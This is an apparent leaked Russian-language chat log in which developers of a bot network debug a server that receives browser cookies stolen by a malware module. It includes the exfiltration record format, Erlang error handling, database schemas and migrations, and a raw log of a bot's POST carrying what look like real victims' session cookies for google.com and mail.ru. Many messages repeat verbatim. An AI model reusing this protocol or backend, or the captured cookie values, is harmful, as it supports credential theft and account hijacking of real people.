2021-08-31T08:35:28.666532  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Разработчик админки планирует добавить 2 поля secure, httponly в конец записи.
Сейчас:
Username, Browser, Domain, Cookie_name, Cookie_value, Created, Expires, Path
	[en] <?>
	[fr] <?>

2021-08-31T08:35:46.674633  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] разделители строк: [ <<10>>, <<13,10>>]
	[en] <?>
	[fr] <?>

2021-08-31T08:37:31.167311  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 403 была, когда некоторые поля не кодировались в В64. В отстойнике они безусловно декодировались.
	[en] <?>
	[fr] <?>

2021-08-31T08:38:28.753341  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] А что по поводу максимального размера данных, он ограничен 64КБ будет?
	[en] <?>
	[fr] <?>

2021-08-31T08:39:10.942687  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] {read_length, 64000},
{read_timeout, 50000}
я могу и больше сделать
	[en] <?>
	[fr] <?>

2021-08-31T08:39:15.180254  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] таковы требоания были
	[en] <?>
	[fr] <?>

2021-08-31T08:40:40.545044  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 50000 это в миллисекундах
	[en] <?>
	[fr] <?>

2021-08-31T08:43:47.771928  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] В модуле нет такого ограничения. Можно разбить на несколько запросов, в принципе.
А какие ошибки отстойник может отдавать? Их желательно как-то обрабатывать.
403 добавил в обработку. На модуль приходили ещё 404 и 500. 500, видимо, от прокладки.
	[en] <?>
	[fr] <?>

2021-08-31T08:45:02.921466  hof@q3mcco35auwcstmt.onion
	[ru] при успешном приеме и добавлении в базу dero всегда выдает 200 и /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:45:02.926845  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] при успешном приеме и добавлении в базу dero всегда выдает 200 и /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:45:20.938590  hof@q3mcco35auwcstmt.onion
	[ru] 403 ошибка формата данных?
	[en] <?>
	[fr] <?>

2021-08-31T08:45:20.942205  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 403 ошибка формата данных?
	[en] <?>
	[fr] <?>

2021-08-31T08:45:42.349963  hof@q3mcco35auwcstmt.onion
	[ru] просо 200 бывает без /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:45:42.352264  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] просо 200 бывает без /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:45:46.769481  hof@q3mcco35auwcstmt.onion
	[ru] просто
	[en] <?>
	[fr] <?>

2021-08-31T08:45:46.774282  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] просто
	[en] <?>
	[fr] <?>

2021-08-31T08:46:17.066963  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas:
	[en] <?>
	[fr] <?>

2021-08-31T08:47:07.167796  hof@q3mcco35auwcstmt.onion
	[ru] зачем этот /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:47:07.173807  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] зачем этот /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:47:10.013185  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] reply(not_found, Req) ->
 { ok, Req1 } = cowboy_req:reply(404, [], <<"Not found">>, Req),
 Req1;

reply(forbidden, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [], <<"Forbidden">>, Req),
 Req1;

reply(missing_data, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing data field!">>, Req),
 Req1;

reply(missing_keys, Req) ->
 { ok, Req1 } = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Missing keys field!">>,  Req),
 Req1;

reply(missing_parameters, Req) ->
 {ok,Req1} = cowboy_req:reply(403, [{<<"Forbidden">>, <<"text/plain">>}], <<"Mismatch parameters count!">>,  Req),
 Req1;

reply(request_timeout, Req) ->
 {ok,Req1} = cowboy_req:reply(408, [{<<"Request Timeout">>, <<"text/plain">>}], <<"Request Timeout">>,  Req),
 Req1;
	[en] <?>
	[fr] <?>

2021-08-31T08:47:16.138566  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот такие ошибки бывают
	[en] <?>
	[fr] <?>

2021-08-31T08:47:22.019900  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] текст у вас отобразился ?
	[en] <?>
	[fr] <?>

2021-08-31T08:47:31.375299  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а то у меня пиджин -- и нифига
	[en] <?>
	[fr] <?>

2021-08-31T08:47:40.865736  hof@q3mcco35auwcstmt.onion
	[ru] отразился
	[en] <?>
	[fr] <?>

2021-08-31T08:47:40.874229  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] отразился
	[en] <?>
	[fr] <?>

2021-08-31T08:48:11.903631  hof@q3mcco35auwcstmt.onion
	[ru] 200 бывает без /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:48:11.909320  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 200 бывает без /1/ ?
	[en] <?>
	[fr] <?>

2021-08-31T08:48:50.549177  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] по коду вроде не бывает
	[en] <?>
	[fr] <?>

2021-08-31T08:48:57.438478  hof@q3mcco35auwcstmt.onion
	[ru] почуму спрашиваю - нужно ли в модуле проверять получение /1/ или достаточно получить статус 200 ?
	[en] <?>
	[fr] <?>

2021-08-31T08:48:57.444719  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] почуму спрашиваю - нужно ли в модуле проверять получение /1/ или достаточно получить статус 200 ?
	[en] <?>
	[fr] <?>

2021-08-31T08:49:06.642501  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [11:47:07] <hof> зачем этот /1/ ?
так по тз
	[en] <?>
	[fr] <?>

2021-08-31T08:49:25.813880  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] это типа следующая команда для клиента
	[en] <?>
	[fr] <?>

2021-08-31T08:49:29.555474  hof@q3mcco35auwcstmt.onion
	[ru] т.е. 200 без /1/ не бывает?
	[en] <?>
	[fr] <?>

2021-08-31T08:49:29.559042  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] т.е. 200 без /1/ не бывает?
	[en] <?>
	[fr] <?>

2021-08-31T08:49:55.934309  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не бывает
	[en] <?>
	[fr] <?>

2021-08-31T08:50:06.566951  hof@q3mcco35auwcstmt.onion
	[ru] ок, отлично
	[en] <?>
	[fr] <?>

2021-08-31T08:50:06.571332  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок, отлично
	[en] <?>
	[fr] <?>

2021-08-31T08:50:53.720942  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] zulas: А сейчас логирование запросов http есть, их можно проверить?
	[en] <?>
	[fr] <?>

2021-08-31T08:51:29.472656  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] есть
	[en] <?>
	[fr] <?>

2021-08-31T08:52:48.118924  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Скинь тогда проблемные запросы.
	[en] <?>
	[fr] <?>

2021-08-31T08:58:25.521735  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 2021-08-31 11:52:22.415 [info] <0.6857.3> Data: <<"POST /tot57/WIN-U4U2CDE99LP_W617601.8C95D48B33FF1976677889D52ABB8859/84/ HTTP/1.0\r\nHost: 203.76.105.227\r\nX-Real-IP: 203.76.105.227\r\nX-Forwarded-For: 203.76.105.227\r\nConnection: close\r\nContent-Length: 11059\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=---------MOBMWAMXGTKVMATK\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\r\nCache-Control: no-cache\r\n\r\n-----------MOBMWAMXGTKVMATK\r\nContent-Disposition: form-data; name=\"data\"\r\n\r\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L2NvbXBsZXRlL3NlYXJjaA==\r\nAdministrador|Chrome|Lmdvb2dsZS5jb20=|Q0dJQw==|RWhReFF6RkRTRUpFWDJWelRWZzVOakZOV0RrMk1TS0hBWFJsZUhRdmFIUnRiQ3hoY0hCc2FXTmhkR2x2Ymk5NGFIUnRiQ3Q0Yld3c1lYQndiR2xqWVhScGIyNHZlRzFzTzNFOU1DNDVMR2x0WVdkbEwyRjJhV1lzYVcxaFoyVXZkMlZpY0N4cGJXRm5aUzloY0c1bkxDb3ZLanR4UFRBdU9DeGhjSEJzYVdOaGRHbHZiaTl6YVdkdVpXUXRaWGhqYUdGdVoyVTdkajFpTXp0eFBUQXVPUQ==|1625670207|1641222207|L3NlYXJjaA==\r\nAdministrador|C...">>
 State: {state,#Port<0.108426>,ranch_tcp,[cowboy_router,cowboy_handler],false,[{listener,http},{dispatch,[{'_',[],[{['...'],[],http_handler,[{limits,32768,1024,4096,102400,8529920,8388608,1024}]}]}]}],undefined,undefined,5,1,100,4096,64,4096,100,5000,1630399947415}
 ReqEmpty 0
2021-08-31 11:52:22.416 [critical] <0.6857.3>@http_handler:handle:33 Error {badmatch,false} [{base64,decode_binary,2,[{file,"base64.erl"},{line,212}]},{http_handler,'-save84/3-fun-4-',5,[{file,"src/http_handler.erl"},{line,329}]},{lists,foreach,2,[{file,"lists.erl"},{line,1338}]},{http_handler,save84,3,[{file,"src/http_handler.erl"},{line,325}]},{http_handler,handle,2,[{file,"src/http_handler.erl"},{line,30}]},{cowboy_handler,handler_handle,4,[{file,"src/cowboy_handler.erl"},{line,111}]},{cowboy_protocol,execute,4,[{file,"src/cowboy_protocol.erl"},{line,443}]}]
	[en] <?>
	[fr] <?>

2021-08-31T08:58:38.143140  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот . не может басе64 декодировать
	[en] <?>
	[fr] <?>

2021-08-31T08:58:42.755242  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не знаю какое поле
	[en] <?>
	[fr] <?>

2021-08-31T08:59:10.715282  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] крашей больше нет
	[en] <?>
	[fr] <?>

2021-08-31T08:59:29.609113  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] всмысли тех что хттп2
	[en] <?>
	[fr] <?>

2021-08-31T09:05:10.045531  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Это старые данные. Сейчас модуль отправляет Username, Domain, Cookie_name, Cookie_value, Path  в В64
	[en] <?>
	[fr] <?>

2021-08-31T09:05:45.412223  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] [ Group, IdLow, IdHigh, base64:decode(Username), Browser, Domain, base64:decode(Cookie_name), base64:decode(Cookie_value), Created, Expires, base64:decode(Path) ]);

вот 4 поля декодируются только
	[en] <?>
	[fr] <?>

2021-08-31T09:05:49.217317  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] надо все ?
	[en] <?>
	[fr] <?>

2021-08-31T09:07:35.429061  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Нужно домен ещё декодировать
	[en] <?>
	[fr] <?>

2021-08-31T09:08:11.257811  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ок .. добавил в новых версиях .
	[en] <?>
	[fr] <?>

2021-08-31T09:09:24.731817  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] <<"INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )">> [<<"tot138">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<"Firefox">>,<<".mail.ru">>,<<"mrcu">>,<<"14B45890605336B122FB29388502">>,<<"1399543312">>,<<"1714903312">>,<<"/">>]
2021-08-31 11:52:59.108 [error] <0.6879.3>@db:transform:58 Error {error,error,<<"22021">>,<<"invalid byte sequence for encoding \"UTF8\": 0x95">>,[]} with query {<<"INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )">>,[<<"tot138">>,4268354464764256071,-5531770838041019469,<<149,166,247>>,<<"Firefox">>,<<".mail.ru">>,<<"mrcu">>,<<"14B45890605336B122FB29388502">>,<<"1399543312">>,<<"1714903312">>,<<"/">>]}

есть еще такое
	[en] <?>
	[fr] <?>

2021-08-31T09:09:32.433326  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] на УТФ-8 не походит кодировка
	[en] <?>
	[fr] <?>

2021-08-31T09:09:59.456064  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И ещё нужно 2 поля добавить в конец записи.
secure, httponly
Значения: 0 & 1
	[en] <?>
	[fr] <?>

2021-08-31T09:10:00.421978  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] насколько я понимаю это про <<149,166,247>>
	[en] <?>
	[fr] <?>

2021-08-31T09:10:26.179746  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] в таблицу колонки ?
	[en] <?>
	[fr] <?>

2021-08-31T09:10:55.309437  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Да, в запись поле, в таблицу колонки.
	[en] <?>
	[fr] <?>

2021-08-31T09:11:43.258346  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] А юникод в каком поле не проходит?
	[en] <?>
	[fr] <?>

2021-08-31T09:20:09.638111  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ,<<149,166,247>> я думаю вот это не может быть юникодом
	[en] <?>
	[fr] <?>

2021-08-31T09:20:45.228376  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] юзернейм
	[en] <?>
	[fr] <?>

2021-08-31T09:22:08.345587  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Похоже, пользователь. Скорее всего модуль не отправляет UTF8. Нужно проверить.
А ты можешь в readme этот формат добавить + описание ошибок?
Мы уже много времени потратили на поиск этих ошибок из-за отсутствия описания протокола обмена.
	[en] <?>
	[fr] <?>

2021-08-31T09:23:06.136343  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] формат чего ?
	[en] <?>
	[fr] <?>

2021-08-31T09:23:49.264092  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] в каталог doc есть некоторое описалово
	[en] <?>
	[fr] <?>

2021-08-31T09:23:54.886092  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Кукисов, например. Ещё бы хорошо остальные данные проверить.
	[en] <?>
	[fr] <?>

2021-08-31T09:24:07.889614  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там кукисы описаны?
	[en] <?>
	[fr] <?>

2021-08-31T09:24:16.336606  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] какие кукисы ?
	[en] <?>
	[fr] <?>

2021-08-31T09:24:39.286951  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Куки, печенюшки
	[en] <?>
	[fr] <?>

2021-08-31T09:24:57.066718  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] я понял что такое куки, но к чему ты это говоришь ?
	[en] <?>
	[fr] <?>

2021-08-31T09:25:05.871493  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] 1. Создать новую команду для получения данных куки. Например, код команды 84

2. Создать таблицу для хранения данных (псевдокод SQL):
CREATE TABLE cookies (
  id SERIAL,
  username VARCHAR(255),
  browser VARCHAR(255)
  domain VARCHAR(255)
  cookie_name VARCHAR(255)
  cookie_value VARCHAR(255)
  created DATETIME,
  expires DATETIME,
  path VARCHAR(255)
);

3. Обеспечить прием данных в следующем формате:
- простой текст, разделенный на строки.
Разделитель строк - может быть как UNIX, так и DOS.
Одна строка - одна запись.
Разделитель полей в записи - вертикальная черта |
Формат записи:

username|browser|domain|cookie_name|cookie_value|created|expires|path\r\n

где

username     - имя пользователя
browser      - код броузера (enum = chrome|ff|ie|edge)
domain       - домен куки
cookie_name  - имя куки
cookie_value - значение куки
created      - дата-время создания, Unix time
expires      - дата-время истечения, Unix time
path         - путь URI
	[en] <?>
	[fr] <?>

2021-08-31T09:26:49.567479  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] К тому, что у меня не было этого дока. Где описание В64? Это часть формата.
	[en] <?>
	[fr] <?>

2021-08-31T09:28:37.307307  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нету про базе64 .. сами добавили очевидно
	[en] <?>
	[fr] <?>

2021-08-31T09:28:51.262142  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] чтобы экранировать символы
	[en] <?>
	[fr] <?>

2021-08-31T09:29:50.578167  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Ну, вот это и нужно в доку добавить.
created у нас в секундах?
	[en] <?>
	[fr] <?>

2021-08-31T09:30:27.365937  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] created_at я ставлю сам как NOW()
	[en] <?>
	[fr] <?>

2021-08-31T09:30:36.635708  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Не догадываться же, как там отстойник обрабатывает, верно?
	[en] <?>
	[fr] <?>

2021-08-31T09:31:00.363613  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а .есть другой ..
	[en] <?>
	[fr] <?>

2021-08-31T09:31:02.581797  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] щас посмотрю
	[en] <?>
	[fr] <?>

2021-08-31T09:31:21.651585  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] А NOW() в секундах?
	[en] <?>
	[fr] <?>

2021-08-31T09:32:35.414837  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] забей на NOW() это другое
	[en] <?>
	[fr] <?>

2021-08-31T09:36:27.498895  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] CREATE TABLE public.data84 (
    id_low bigint NOT NULL,
    id_high bigint NOT NULL,
    "group" character varying(64),
    created_at timestamp without time zone,
    username text,
    browser text,
    domain text,
    cookie_name text,
    cookie_value text,
    created text,
    expires text,
    path text
);
	[en] <?>
	[fr] <?>

2021-08-31T09:36:31.363979  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] вот таблица
	[en] <?>
	[fr] <?>

2021-08-31T09:36:37.406424  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] created - просто текст
	[en] <?>
	[fr] <?>

2021-08-31T09:36:41.642186  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нету про базе64 .. сами добавили очевидно 
Ну, не для всех очевидно ) У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.
	[en] <?>
	[fr] <?>

2021-08-31T09:36:43.349041  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] всё - просто текст
	[en] <?>
	[fr] <?>

2021-08-31T09:37:34.040053  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] > У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.  
очевидно не я один это добавлял и не только на моей стороне, иначе не работало бы.
коду уже 5 лет
	[en] <?>
	[fr] <?>

2021-08-31T09:39:30.948511  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Ну, это тоже не очевидно)
По факту ошибки посыпались. Документация не полная.
	[en] <?>
	[fr] <?>

2021-08-31T09:41:31.313726  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] где же ты был )
	[en] <?>
	[fr] <?>

2021-08-31T10:40:22.321823  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Zulas ты под новые поля базу тоже будешь менять?
Если да то просьба этого не делать, я веду миграции и хотелось бы чтобы все изменения в базе в них были отражены.
	[en] <?>
	[fr] <?>

2021-08-31T10:40:58.855178  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Я написал миграции под два поля secure и httponly
	[en] <?>
	[fr] <?>

2021-08-31T10:41:19.042988  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оба логических.
	[en] <?>
	[fr] <?>

2021-08-31T10:41:50.953509  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не буду делать .
	[en] <?>
	[fr] <?>

2021-08-31T10:41:53.236374  hof@q3mcco35auwcstmt.onion
	[ru] и в 90 команду добавились новые поля
	[en] <?>
	[fr] <?>

2021-08-31T10:41:53.240939  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и в 90 команду добавились новые поля
	[en] <?>
	[fr] <?>

2021-08-31T10:42:06.309901  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ты базу на рабочем уже поменял ?я могу слить дамп ?
	[en] <?>
	[fr] <?>

2021-08-31T10:42:24.066732  hof@q3mcco35auwcstmt.onion
	[ru] поля не будут сохраняться, если их больше?
	[en] <?>
	[fr] <?>

2021-08-31T10:42:24.071555  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поля не будут сохраняться, если их больше?
	[en] <?>
	[fr] <?>

2021-08-31T10:42:41.759921  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] dlls, programs, services Я тоже уже добавил
	[en] <?>
	[fr] <?>

2021-08-31T10:42:55.644664  hof@q3mcco35auwcstmt.onion
	[ru] а, ок
	[en] <?>
	[fr] <?>

2021-08-31T10:42:55.646911  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, ок
	[en] <?>
	[fr] <?>

2021-08-31T10:42:55.699571  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не накатил, сек сделаю
	[en] <?>
	[fr] <?>

2021-08-31T10:44:25.982350  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
	[en] <?>
	[fr] <?>

2021-08-31T10:44:38.110725  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И в бэке его тоже вроде как нет
	[en] <?>
	[fr] <?>

2021-08-31T10:44:40.987819  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] добавляй сразу всё чтобы мне не возвращаться
	[en] <?>
	[fr] <?>

2021-08-31T10:46:16.071480  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
	[en] <?>
	[fr] <?>

2021-08-31T11:01:29.531061  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] По 2м полям в куках накатил миграции.
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.202848  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] нету про базе64 .. сами добавили очевидно 
Ну, не для всех очевидно ) У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.203338  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] всё - просто текст
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.204557  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] > У нас каждый своей частью работы занимается, кто там что правит - зачастую неизвестно.  
очевидно не я один это добавлял и не только на моей стороне, иначе не работало бы.
коду уже 5 лет
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.205297  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Ну, это тоже не очевидно)
По факту ошибки посыпались. Документация не полная.
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.206066  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] где же ты был )
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.207318  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Zulas ты под новые поля базу тоже будешь менять?
Если да то просьба этого не делать, я веду миграции и хотелось бы чтобы все изменения в базе в них были отражены.
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.208464  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Я написал миграции под два поля secure и httponly
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.209202  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оба логических.
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.209995  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не буду делать .
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.211005  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и в 90 команду добавились новые поля
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.212453  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ты базу на рабочем уже поменял ?я могу слить дамп ?
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.218230  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поля не будут сохраняться, если их больше?
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.219750  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] dlls, programs, services Я тоже уже добавил
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.220657  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, ок
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.221791  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не накатил, сек сделаю
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.222753  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.224142  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И в бэке его тоже вроде как нет
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.225089  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] добавляй сразу всё чтобы мне не возвращаться
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.226731  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
	[en] <?>
	[fr] <?>

2021-08-31T11:05:53.227830  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] По 2м полям в куках накатил миграции.
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.421299  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оба логических.
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.421905  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] не буду делать .
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.423063  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] и в 90 команду добавились новые поля
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.423539  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] ты базу на рабочем уже поменял ?я могу слить дамп ?
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.424179  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] поля не будут сохраняться, если их больше?
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.425056  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] dlls, programs, services Я тоже уже добавил
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.426067  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] а, ок
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.426661  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не накатил, сек сделаю
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.427372  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Там поле под ярлыки desktop нужно еще, но пока не добавил его в миграцию.
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.428065  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] И в бэке его тоже вроде как нет
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.428553  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] добавляй сразу всё чтобы мне не возвращаться
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.429427  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Пока не смогу. Ближе к вечеру время появится.
Там нужно в других частях это поле добавлять, поэтому быстро не смогу сделать.
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.430186  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] По 2м полям в куках накатил миграции.
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.431249  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] такой вопрос есть. Из за чего может быть такое, что я делаю запрос, бэк мне отвечает /1/ но в логах уровня info запроса нет, при этом в базе тех данных, которые я передал тоже нет. 
В бэке написано что /1/ это всегда про ответ 200, но я заметил что он отвечает /1/ и если бот есть в базе, и если его нет.
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.431931  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] хороший вопрос, но зуласа нету в конфе уже
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.432690  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] потому повтори этот вопрос как он появится
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.433331  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] Оке, тут получается нет истории..
	[en] <?>
	[fr] <?>

2021-08-31T16:17:38.433903  ttrr@conference.q3mcco35auwcstmt.onion
	[ru] неа
	[en] <?>
	[fr] <?>

